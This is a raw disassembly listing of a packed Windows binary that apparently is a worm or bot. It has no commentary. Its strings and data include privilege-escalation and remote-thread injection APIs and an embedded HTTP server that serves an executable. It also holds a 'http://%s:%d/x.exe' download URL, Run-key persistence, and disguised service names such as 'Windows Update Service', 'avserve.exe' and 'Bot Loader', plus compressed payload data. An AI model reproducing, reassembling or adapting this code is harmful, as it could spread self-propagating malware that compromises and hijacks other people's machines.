dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_31424A20 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_31424A8C dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31424B00 dd 0 ; DATA XREF: sub_31421801+3A0�o
dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_31424BBE dd 1004600h ; DATA XREF: sub_31421801+289�r
dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31424BF8 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_31421801+41B�o
; sub_31421801+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_31424C70: ; DATA XREF: sub_31421801+44A�o
jmp short loc_31424C78
; ---------------------------------------------------------------------------
jmp short loc_31424C7A
; ---------------------------------------------------------------------------
align 8
loc_31424C78: ; CODE XREF: UPX0:loc_31424C70�j
; DATA XREF: sub_31421801+5C�o
pop esp
pop esp
loc_31424C7A: ; CODE XREF: UPX0:31424C72�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_31424C84 dd 1CEC8166h ; DATA XREF: sub_31421801+D�r
dword_31424C88 dd 0E4FF07h ; DATA XREF: sub_31421801+1C�r
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31421D68+62�o
align 10h
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31421D68+39�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31421D68+2A�o
align 10h
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31421D68+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31421D68+8�o
; sub_314223B2+12C�o
align 10h
aUterm192 db 'uterm19-2',0 ; DATA XREF: sub_31421DF0:loc_31421ED5�o
; UPX0:31422351�o ...
align 4
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31421DF0+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31421DF0:loc_31421E37�o
align 10h
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31421DF0+34�o
align 10h
aKernel32 db 'kernel32',0 ; DATA XREF: sub_31421DF0+18�o
align 4
dword_31424D3C dd 0E9F3F5h ; DATA XREF: sub_3142207E+112�o
aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+106�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 4
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_3142207E+85�o
db 0Dh,0Ah,0
align 10h
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 10h
aGet db 'GET',0 ; DATA XREF: sub_3142207E+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:3142233C�o
align 10h
aUser32 db 'user32',0 ; DATA XREF: sub_314223B2+133�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_314223B2+125�o
align 10h
aWininet db 'wininet',0 ; DATA XREF: sub_314223B2+11E�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_314223B2+111�o
align 10h
aU192x db 'u19-2x',0 ; DATA XREF: sub_314223B2+BD�o
align 4
aU19 db 'u19',0 ; DATA XREF: sub_314223B2+B6�o
aU18 db 'u18',0 ; DATA XREF: sub_314223B2+AF�o
aU17 db 'u17',0 ; DATA XREF: sub_314223B2+A8�o
aU16 db 'u16',0 ; DATA XREF: sub_314223B2+A1�o
aU15 db 'u15',0 ; DATA XREF: sub_314223B2+9A�o
aU14 db 'u14',0 ; DATA XREF: sub_314223B2+93�o
aU13i db 'u13i',0 ; DATA XREF: sub_314223B2+8C�o
align 4
aU13 db 'u13',0 ; DATA XREF: sub_314223B2+85�o
aU12 db 'u12',0 ; DATA XREF: sub_314223B2+7E�o
aU11 db 'u11',0 ; DATA XREF: sub_314223B2+77�o
aU10 db 'u10',0 ; DATA XREF: sub_314223B2+70�o
aU9 db 'u9',0 ; DATA XREF: sub_314223B2+69�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_314223B2+62�o
align 10h
aU18x db 'u18x',0 ; DATA XREF: sub_314223B2+5B�o
align 4
aU17x db 'u17x',0 ; DATA XREF: sub_314223B2+54�o
align 10h
aU16x db 'u16x',0 ; DATA XREF: sub_314223B2+4D�o
align 4
aU15x db 'u15x',0 ; DATA XREF: sub_314223B2+46�o
align 10h
aU14x db 'u14x',0 ; DATA XREF: sub_314223B2+3F�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_314223B2+38�o
align 10h
aU12x db 'u12x',0 ; DATA XREF: sub_314223B2+31�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_314223B2+2A�o
align 10h
aU10x db 'u10x',0 ; DATA XREF: sub_314223B2+23�o
align 4
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_31422712+2D�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_314221C4+23�o
; sub_314229E6+66�o ...
align 4
aCryptographicS db 'Cryptographic Service',0 ; DATA XREF: sub_314221C4+1C�o
; sub_31422A9B+87�o ...
align 4
aSqsfqbjdrkpbhb db 'sqsfqbjdrkpbhbxmjsw',0 ; DATA XREF: sub_314215C7+4F�o
; sub_31422B67+57�o ...
dd 0
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31422B67+32�o
aClient db 'Client',0 ; DATA XREF: sub_31422B67+BC�o
; sub_31422B67+F8�o
align 10h
aId db 'ID',0 ; DATA XREF: sub_31422B67+37�o
; sub_31422B67+75�o
align 4
aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_314229E6+55�o
align 4
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_314229E6+4E�o
align 4
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_314229E6+47�o
align 10h
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_314229E6+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_314229E6+39�o
align 4
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_314229E6+32�o
align 10h
aSystray db 'SysTray',0 ; DATA XREF: sub_314229E6+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_314229E6+24�o
align 4
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_314229E6+1D�o
align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_314229E6+16�o
align 10h
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_314229E6+F�o
align 4
a1: ; DATA XREF: sub_31422B67+B7�o
unicode 0, <1>,0
dd 6 dup(0)
dword_31424FE8 dd 0 ; DATA XREF: sub_3142207E+C7�r
; sub_314221C4+80�w
dword_31424FEC dd 0 ; DATA XREF: sub_314215C7+43�r
; sub_314216A2+53�o ...
dword_31424FF0 dd 0 ; DATA XREF: sub_3142207E+79�r
; sub_3142207E:loc_3142212C�r ...
dword_31424FF4 dd 44h ; DATA XREF: sub_31421DF0+C2�r
; UPX0:3142235C�w ...
dword_31424FF8 dd 0 ; DATA XREF: sub_3142239E+2�r
; sub_314223B2+CE�w
dword_31424FFC dd 0 ; DATA XREF: sub_314221C4+E0�w
; sub_31422712+20�r
dword_31425000 dd 31420000h ; DATA XREF: sub_31421DF0+6�r
; UPX0:31422341�w
dword_31425004 dd 0 ; DATA XREF: sub_314215C7+49�r
; sub_314216A2+4A�o ...
dword_31425008 dd 0 ; DATA XREF: UPX0:314227AF�w
; UPX0:314227C1�w
word_3142500C dw 0 ; DATA XREF: sub_3142255F+3B�r
; sub_314225C3:loc_31422624�r ...
align 10h
dword_31425010 dd 0 ; DATA XREF: sub_31422B67+25�w
; sub_31422B67+110�w
align 1000h
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00006000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31426000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31426000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
; DATA XREF: UPX1:31427BB1�o
dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h
dd 70637274h, 1004179h, 61657243h, 76456574h, 41746E65h
dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h
dd 44010074h, 74656C65h, 6C694665h, 1004165h, 74697257h
dd 6C694665h, 43010065h, 65736F6Ch, 646E6148h, 100656Ch
dd 61657243h, 69466574h, 41656Ch, 74736C01h, 6E656C72h
dd 6C010041h, 63727473h, 417461h, 74654701h, 74737953h
dd 69446D65h, 74636572h, 4179726Fh, 65470100h, 636F4C74h
dd 49656C61h, 416F666Eh, 6C530100h, 706565h, 746E4901h
dd 6F6C7265h, 64656B63h, 68637845h, 65676E61h, 736C0100h
dd 70637274h, 416E79h, 74654701h, 72727543h, 50746E65h
dd 65636F72h, 1007373h, 50746547h, 41636F72h, 65726464h
dd 1007373h, 64616F4Ch, 7262694Ch, 41797261h, 72570100h
dd 50657469h, 65636F72h, 654D7373h, 79726F6Dh, 704F0100h
dd 72506E65h, 7365636Fh, 47010073h, 6F4D7465h, 656C7564h
dd 646E6148h, 41656Ch, 74654701h, 6B636954h, 6E756F43h
dd 43010074h, 74616572h, 74754D65h, 417865h, 65724301h
dd 54657461h, 61657268h, 43010064h, 74616572h, 6F725065h
dd 73736563h, 53010041h, 76457465h, 746E65h, 65704F01h
dd 6576456Eh, 41746Eh, 69784501h, 72685474h, 646165h, 746E4901h
dd 6F6C7265h, 64656B63h, 72636E49h, 6E656D65h, 52010074h
dd 46646165h, 656C69h, 74654701h, 656C6946h, 657A6953h
dd 78450100h, 72507469h, 7365636Fh, 47010073h, 614C7465h
dd 72457473h, 726F72h, 0D100h, 0
dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h
dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h
dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh
dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h
dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh
dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h
dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h
dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h
dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h
dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h
dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h
dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h
dd 74726F70h, 79654Bh, 0DE00h, 0EC00h, 72730100h, 646E61h
dd 6D656D01h, 797063h, 72747301h, 6E656Ch, 6D656D01h, 746573h
dd 6E617201h, 5F010064h, 65637865h, 685F7470h, 6C646E61h
dd 337265h, 72747301h, 727473h, 72747301h, 726863h, 0E900h
dd 11000h, 69460100h, 6957646Eh, 776F646Eh, 47010041h
dd 6F467465h, 72676572h, 646E756Fh, 646E6957h, 100776Fh
dd 57746547h, 6F646E69h, 72685477h, 50646165h, 65636F72h
dd 64497373h, 73770100h, 6E697270h, 416674h, 0F400h, 12400h
dd 6E490100h, 6E726574h, 704F7465h, 72556E65h, 100416Ch
dd 65746E49h, 74656E72h, 6E65704Fh, 49010041h, 7265746Eh
dd 4374656Eh, 65736F6Ch, 646E6148h, 100656Ch, 65746E49h
dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h
dd 49010065h, 7265746Eh, 5274656Eh, 46646165h, 656C69h
dd 10000h, 13C00h, 73FF00h, 0FF0002FFh, 1FF000Dh, 39FF00h
dd 0FF006FFFh, 17FF0034h, 0CFF00h, 0FF0009FFh, 13FF0004h
dd 10FF00h, 0FF0016FFh, 3, 50000000h, 4C000045h, 0DC000201h
dd 40DD34h, 0
dd 0E0000000h, 0B010F00h, 601h, 26h, 12h, 34000000h, 23h
dd 10h, 40h, 314200h, 10h, 4000002h, 0
dd 4000000h, 2 dup(0)
dd 60h, 4, 2000000h, 0
dd 1000h, 10h, 1000h, 10h, 10000000h, 2 dup(0)
dd 34000000h, 8C00002Dh, 15h dup(0)
dd 7C000010h, 1, 5 dup(0)
dd 2E000000h, 74786574h, 56000000h, 24h, 10h, 26h, 4, 2 dup(0)
dd 20000000h, 2EE00400h, 61746164h, 14000000h, 10h, 40h
dd 10h, 2Ah, 2 dup(0)
dd 40000000h, 0C00000h, 3C000050h, 0C300002Fh, 0A1000054h
dd 89254BBEh, 0DB43AA85h, 0AEF070A0h, 92A2047Dh, 4EC00F3Ch
dd 27BE81Ch, 8402F26Ah, 47FC7D1Bh, 0F0024A19h, 0A033E402h
dd 2164868h, 0D2B735D7h, 0A73D7D03h, 769F6801h, 36E6CCE6h
dd 3A4A2064h, 1B5AB7CCh, 0DC87B734h, 6A7684E0h, 96F42A70h
dd 0E6C8E38Ch, 5EC86080h, 7A97640Ah, 273E1B25h, 0A2280084h
dd 364B003Fh, 3CD9B96Bh, 98B9B26Ch, 0E477BDE2h, 0DC016754h
dd 317E500Fh, 0C777C3E4h, 0AC683B0Dh, 0D328C00Dh, 0B138CEDCh
dd 0E56F08C9h, 0DB0C7A04h, 0D2484522h, 0DD2DC5F8h, 0D61B212Fh
dd 402EDB1Ch, 67012DEh, 4C9039ECh, 40BCF844h, 0C27190D6h
dd 1BDE5044h, 593B1E10h, 94B7336Fh, 8121970Dh, 67E9ACF9h
dd 0E87CFEEBh, 1624A580h, 68250600h, 259D1C52h, 1CF25B07h
dd 96F41276h, 899DE9C3h, 940AEF65h, 7BC87C6Ah, 64B1E3C3h
dd 0C9BE490Ch, 991DD97Bh, 90E154E4h, 8C9FE924h, 0DCCCC349h
dd 0CF78242Eh, 2C8248EDh, 0F864052Ch, 66F4150Ch, 3319A002h
dd 8707A23h, 8F895E74h, 0F4C6DD0Eh, 1C51CC5Fh, 80B3EF9Ch
dd 7F24E4A1h, 5A435A8h, 0B5D0781Bh, 571282F8h, 5A745737h
dd 0ACBF931h, 74F80E14h, 9A0684Bh, 0CA28B753h, 2D3D74CEh
dd 67ED85C9h, 0A0412069h, 0FFC55FFh, 35BAB9E8h, 50E49ED7h
dd 0E9628ACh, 5B3002F0h, 5547BF4Dh, 8C0009F8h, 681583E4h
dd 0F475583Bh, 1887EE42h, 851321C5h, 0A90A508Bh, 0BFF77FB6h
dd 3C418B2Fh, 68C10357h, 488B4D30h, 50788B34h, 0A0F44D89h
dd 8D7031B4h, 1BDBD84Bh, 0CD5285D8h, 1F0F552h, 0EC7047D2h
dd 0EC1265F1h, 0D790ED74h, 9ABD1110h, 0E82636Ch, 5D231409h
dd 0F11BE164h, 5051F84Dh, 68971818h, 8B1B1528h, 5DB0892Ah
dd 58D1B040h, 6B03CA3Ah, 5E30EB34h, 193B5BB5h, 0F05559ABh
dd 52EA037Dh, 45E626B7h, 3151F03Eh, 3DC25350h, 0AC1ED9F1h
dd 0D6BDF435h, 3C4FFAFAh, 0D06A1778h, 3BEC5577h, 5F0574C7h
dd 589B56B9h, 8CBF1BEBh, 0B9CD2534h, 0E5985CDh, 7EB05FCh
dd 0A1EF7408h, 5817D487h, 51515FFCh, 6468512Fh, 310F60B8h
dd 0D00D5C69h, 252C8836h, 0B1AFDDB8h, 0AEBAC44Ch, 0FECB213h
dd 71C22D59h, 0F9EBA67Bh, 3CBCB66Ah, 35500C80h, 0A82C49DDh
dd 2C507D50h, 91165DC0h, 2019852Eh, 0A971437Ch, 8B577F16h
dd 0D214247Ch, 0FD177E11h, 8760CFFFh, 61C2801Ah, 461E1488h
dd 0E97CF73Bh, 3B2480h, 593575B6h, 448B548Ch, 65A5F2Eh
dd 0ACF19D0Ch, 66DB5657h, 0BB622F21h, 0DC73074Bh, 501950F0h
dd 4D000056h, 0ACAA25B8h, 0DBC49577h, 4DF0E3DAh, 0FA6849F4h
dd 65FFF00Ch, 0C7A326DAh, 0CC343408h, 7B666B2Ah, 754C2EB2h
dd 0BC500A0Ah, 0E84F8520h, 54181A5Ch, 7FB807C6h, 5F6B7C3Bh
dd 40740180h, 1008B0Ch, 448D5108h, 0B166D824h, 30215F73h
dd 5903D311h, 4D3E13BAh, 0CC150724h, 0C82007BBh, 1D0CF1FEh
dd 0C8E4332Fh, 10E7C1F8h, 0D9919E6Ch, 0B60B85h, 915D8B02h
dd 12351C09h, 4001F333h, 0C2C03AB2h, 0CFC653C4h, 0E3676D5Eh
dd 5035F211h, 0B4B06825h, 831C0135h, 33ADE748h, 0B5ECF203h
dd 9541F017h, 7568CC35h, 3D986866h, 6C58B7A3h, 0F0446EC6h
dd 58FE474Fh, 0B31A54Dh, 0DA141B37h, 0EEBF0354h, 34007C74h
dd 0B933A1h, 0BAEDDB79h, 3BC72B7Fh, 8B0272C1h, 292BE1C1h
dd 318E8A1h, 0BF8923C7h, 0CCACDCA5h, 1172233Dh, 0A36786Ah
dd 40F868CFh, 0E113C4EBh, 5B3D9350h, 0D411778Ch, 5815941Eh
dd 68C9BB93h, 68030B40h, 6759973Ch, 3A3CB36Dh, 52535453h
dd 8FA311F8h, 9824D083h, 4DB04C2h, 30232C66h, 0B1F70E64h
dd 60B0C0B5h, 4EE808D0h, 3A95D0DDh, 6806C8EEh, 1D898068h
dd 0EEDB6897h, 7E182784h, 0D4C014ECh, 0DB3000F2h, 539153DAh
dd 3A01027Bh, 4D26B51Ah, 0FD7780EBh, 39ACD28Dh, 2F741A4Dh
dd 1D59DECDh, 0CA3DC9Eh, 0B6FEA365h, 0A49784C6h, 565153FCh
dd 37D83A86h, 6874B623h, 5EF92656h, 0FBE369Ah, 10C25819h
dd 56C05E05h, 8499A5E9h, 89E80C4Bh, 0D80DEC5Dh, 53BFB7Dh
dd 1FFF25FFh, 0A3C33A04h, 0E77443FCh, 37FA126Fh, 84CC8A1Fh
dd 50DF74C9h, 6E42EA6Bh, 5F57C661h, 6465A540h, 0AFA6B0Ch
dd 5F7B4499h, 1FD814F8h, 0E8FEB3ABh, 7E689E48h, 624E1520h
dd 7B385097h, 0CF53E2EBh, 9043455Fh, 3059875Eh, 3CAE7001h
dd 36D0F433h, 11D6B0EBh, 0D6E6023Eh, 0C1E6C342h, 68B4803Ah
dd 63A3ABB4h, 0BE608AC0h, 7B7C74E0h, 76336182h, 0E4FBF4A3h
dd 4552B73Dh, 767BB37Dh, 640D29E0h, 1BE21904h, 23B26863h
dd 9C170D13h, 0EB13EC13h, 7EC6AC86h, 99AE13EDh, 44F83569h
dd 0E4093970h, 8F401824h, 4DC3390h, 8C64D24Bh, 0EF609045h
dd 391C8E06h, 98589472h, 0A0489C50h, 2391C840h, 0A838A447h
dd 1C28AC30h, 0B0E47239h, 0B81CB420h, 9114BC18h, 0C08E4723h
dd 0C80CC410h, 0F3E47208h, 0D000CCC8h, 0F8D44DFCh, 8E6DF4D8h
dd 0F0DC391Ch, 0E8E4ECE0h, 6CD7E068h, 3704C011h, 0DEA36CD3h
dd 0ADB72F1Bh, 8C02FCB0h, 12730983h, 6EDD8C34h, 85414B80h
dd 594A8D90h, 0E8EB0CFFh, 9C8709B1h, 5CB40D1Ah, 7E0F991Ah
dd 748739A1h, 4DD86839h, 989DA8ABh, 4D373D8Ch, 0F6DC806h
dd 0DD26121h, 4659AC0h, 5BB3B724h, 1521C46Bh, 16A20A34h
dd 0E41173E3h, 2842276Eh, 0D21E5F9Ah, 0B414AE87h, 1388F818h
dd 24E3EB9Ch, 99093C28h, 95AF5A15h, 247031B6h, 0A4806355h
dd 1F0AAD7Fh, 8A51AD01h, 6A9E0B45h, 0EC380C1Eh, 52DB32FFh
dd 3831CC3Ah, 108FE35Dh, 8825DCDFh, 7D20B5Dh, 35B70FFDh
dd 80CF5A0Ch, 0F59A93Fh, 3FEF799h, 0C3FE8ED6h, 0FC65B2EDh
dd 72FFFB80h, 62BA5EBDh, 3B265F76h, 6F045981h, 0A0586833h
dd 4F43856Dh, 40A8108h, 9DB59B0Ch, 8F0B090Dh, 9B49275h
dd 0F758076h, 2C255FF9h, 0D9DADE41h, 84323D89h, 0E7D703FFh
dd 43EB50DBh, 9623FB81h, 5D875F9Fh, 13B166BAh, 5A737B4Fh
dd 73C196A2h, 2FE665h, 0DBE78B79h, 0FF04FD73h, 7F3CF6FEh
dd 0C6C5B688h, 0F50F339Fh, 0F33B088Bh, 3B27AADCh, 0A33E1D8Bh
dd 2F9E57A0h, 2259ED57h, 0F8D69C60h, 56E21359h, 0FFC390E2h
dd 0EE75B3BBh, 5E1AC8ECh, 271068F2h, 0D3BED3A6h, 1C18099Eh
dd 2D70843Ch, 2AD650A9h, 454E6105h, 32F8FC2h, 5C6A2BA6h
dd 9DCDF2AAh, 3A4C5E0Fh, 6E030BFCh, 0B0AB60C0h, 103B4E35h
dd 0BC025E11h, 42BA275Bh, 80C6096Ch, 0FAE17616h, 6F39DF0Bh
dd 57935655h, 57B1019h, 13E6D884h, 8F0D0CC3h, 1F0CA551h
dd 0B120DDFDh, 1462F489h, 0BF66153h, 340B7F02h, 38506ADBh
dd 52C5D08h, 740096D2h, 0B5E8F1AEh, 1110918h, 3BB00510h
dd 141960E1h, 6D84F00h, 103B0E17h, 0BDAAA27Eh, 0D5530D74h
dd 203C51C7h, 11106844h, 18244C39h, 37D0DB0Eh, 0ED85ED3Ah
dd 4BA5117Eh, 834D2C26h, 14DB0EEDh, 0A20596EFh, 750DF2EBh
dd 24B7160Eh, 0FADDEB65h, 2C193F68h, 1B33D170h, 46CE0C96h
dd 0A915182Ch, 0E974106Eh, 1408FA10h, 18D9512Fh, 165B1B56h
dd 1837FC72h, 3D563EF6h, 0B8C6239h, 412ADC74h, 0C0B6E965h
dd 2050D361h, 6C5F1810h, 3089381h, 550F5EAAh, 344AEB8Bh
dd 33E1C68Bh, 32C562Eh, 5359D932h, 27005556h, 108B59CBh
dd 0C520A25h, 724C5904h, 0AF5D0C20h, 0E418713Ch, 0DE530128h
dd 7EDE4E21h, 8E6956E2h
dd 1E3C3494h, 794E365Ch, 0D8875F7h, 1D140487h, 0B2582D28h
dd 7AA4BBC5h, 0D85A3568h, 3D9A045Eh, 203B10F4h, 813DDF06h
dd 7D221DCFh, 1E748D47h, 983F7B01h, 56FCCF40h, 0FF1C1E48h
dd 0DEA5E417h, 4545E0B5h, 521F0FFFh, 36666C38h, 46506008h
dd 0E6740E1Ch, 89BD766Ah, 36A93CB7h, 0D68681B2h, 4FB0B657h
dd 8E47069Ch, 84D4391Ch, 70DC78D8h, 0C8E464E0h, 4CE42391h
dd 24EC40E8h, 72398326h, 4F414F0h, 9C4C84B7h, 0BF0B9A2Fh
dd 8AF9BE64h, 7E2C742Ch, 0C43D188Bh, 34597B06h, 177572B4h
dd 0D354490Eh, 91DC113h, 48833E2Ah, 0A3C9A891h, 88E075BDh
dd 0C1361188h, 9746A78h, 317674B4h, 8859FE8Bh, 0BCDE636Ah
dd 0F82FA184h, 83227027h, 0C08303E0h, 51705705h, 59CD45E9h
dd 230DCAFDh, 1210CFD7h, 0BDCCC33Dh, 26D60713h, 9D3F140Eh
dd 0E887B305h, 40A26150h, 0E84D096Fh, 0C63F4120h, 99598B36h
dd 41D986D7h, 60D9F424h, 1F4541Bh, 61E812B8h, 8BE007BAh
dd 22E7D89Fh, 1FC517D0h, 0A600C748h, 5914310Dh, 21BA1025h
dd 0B3BFBF08h, 501D6AE0h, 71DCBFh, 0A03F514Fh, 7403D583h
dd 0BB0A3137h, 615FD8A0h, 52D1BEA7h, 8B37F453h, 0BC3D660Dh
dd 0B1383D53h, 0EE6BDB3Ah, 0CE590FEBh, 368B632h, 1B0C165Bh
dd 16C965E2h, 0C2268DDCh, 3141CC68h, 683A464Eh, 0B9BB66E7h
dd 12971A0Dh, 66AF495Eh, 4A4C12C1h, 0DE1219EEh, 0BBC631D8h
dd 162CFD3Bh, 0B596C823h, 0A3480710h, 0CF216C5h, 0CD6015EBh
dd 1CA65709h, 5D511910h, 43D5F07Dh, 5044330Ch, 856A7D68h
dd 138B67BEh, 0CC4011h, 0F23306FFh, 5284CDCh, 0F0F410F8h
dd 3DF52351h, 9B51001Bh, 0FBF63F8Dh, 14723BBEh, 2D0BE981h
dd 17018504h, 0C82BEC73h, 0D5A0568Bh, 8B0CC4B7h, 0EA088BE1h
dd 0C6C653A3h, 6443B646h, 4958055Ch, 0A8A04500h, 51E600C0h
dd 6F18054h, 0E296EF02h, 53522497h, 8F803141h, 8DF50101h
dd 0FFFF1183h, 5279FFFFh, 3AE42AECh, 9B49E7F6h, 0AFBEE0EAh
dd 447EDB21h, 615E1A95h, 1F85A032h, 0FF949F6Ah, 43FF3994h
dd 0A684FFFFh, 0CE358F26h, 0C9A55C1Dh, 657AB20Bh, 4D373072h
dd 6C697A6Fh, 0FF6B616Ch, 342FFFFFh, 2820302Eh, 706D6F63h
dd 62697461h, 203B656Ch, 4549534Dh, 9153620h, 7FFFBA81h
dd 646E6957h, 2073776Fh, 3520544Eh, 3429312Eh, 0BE798EE4h
dd 0D4007767h, 0B4C40104h, 0E790A00Eh, 80E7BEFBh, 0E680474h
dd 9B480958h, 3C9E79ECh, 4530D474h, 0E7C82220h, 4A1026F9h
dd 40F80030h, 6FFDB6B7h, 76766313h, 7E75722Eh, 65070077h
dd 0C6DFEF64h, 65976CB6h, 65C1660Fh, 72616573h, 370E6863h
dd 1F6FFE57h, 6F626F72h, 61686378h, 1FD2676Eh, 7C8D7465h
dd 720C6FFBh, 69622E64h, 2861007Ah, 616B6863h, 0BB17376Dh
dd 6740CB0h, 24782Dh, 0B76F6C06h, 0E6DB66Dh, 476B3762h
dd 7A027626h, 0DFB1852Eh, 1B7674DEh, 706F7411h, 69176E2Eh
dd 10ADB00Fh, 332773B0h, 6F0F788Dh, 611FE176h, 746C7564h
dd 694B652Dh, 0E1338072h, 6FDB6EDBh, 4E73A66Eh, 67622E74h
dd 6B67694Fh, 32580FBFh, 61777800h, 62626A2Ch, 0F676DFADh
dd 7A9B006Fh, 0A8616661h, 23655D2Eh, 10FFFE5Ch, 6261AF09h
dd 66656463h, 6A696867h, 6E6D6C6Bh, 0DDBF0A1Bh, 0F77271C5h
dd 78777675h, 43650E79h, 0F8DFED44h, 474645FFh, 4B4A4948h
dd 4F4E4D4Ch, 54545150h, 58575655h, 71B5A59h, 23187FF6h
dd 70747468h, 252F2F3Ah, 0DF2F0B73h, 65737E16h, 68702E97h
dd 3D0E3F70h, 6373260Fh, 0CF6FED6Eh, 2664066Fh, 76666E69h
dd 39313D3Bh, 1526322Dh, 0B948EC1Eh, 0EBA21D74h, 32313D58h
dd 7F7D9137h, 3101A8D7h, 3030383Ah, 0DFDF652Fh, 1FFFFB00h
dd 5DDFE8B0h, 0B966C933h, 758D01EEh, 8AFE8B05h, 7993C06h
dd 6DFFFD06h, 302C0646h, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 0FEFFDB7Eh, 6765DF85h, 9993712Eh, 0FD1201C9h, 16FD91BDh
dd 0FEEBC107h, 6872FFFDh, 66FD42AAh, 0BA10FDAAh, 98A91C14h
dd 98F3C91Ah, 28608F1h, 763FF67Fh, 9010C071h, 9237CB5Fh
dd 781C9659h, 57E4143Ah, 7DB77D71h, 3A0A61F2h, 9DF34571h
dd 98904F1h, 0DF73A47Fh, 119C04F1h, 0F367B340h, 1C10F0E3h
dd 0B1DDBDFEh, 59B20BDCh, 25C99B60h, 414D901h, 0B1F2C8A1h
dd 71CA17C7h, 688D2B9Eh, 0ADAD9161h, 1AC2F67Dh, 111D96E2h
dd 0C850B228h, 0FDBB9900h, 0DC14EDB3h, 12255557h, 91C0A44Eh
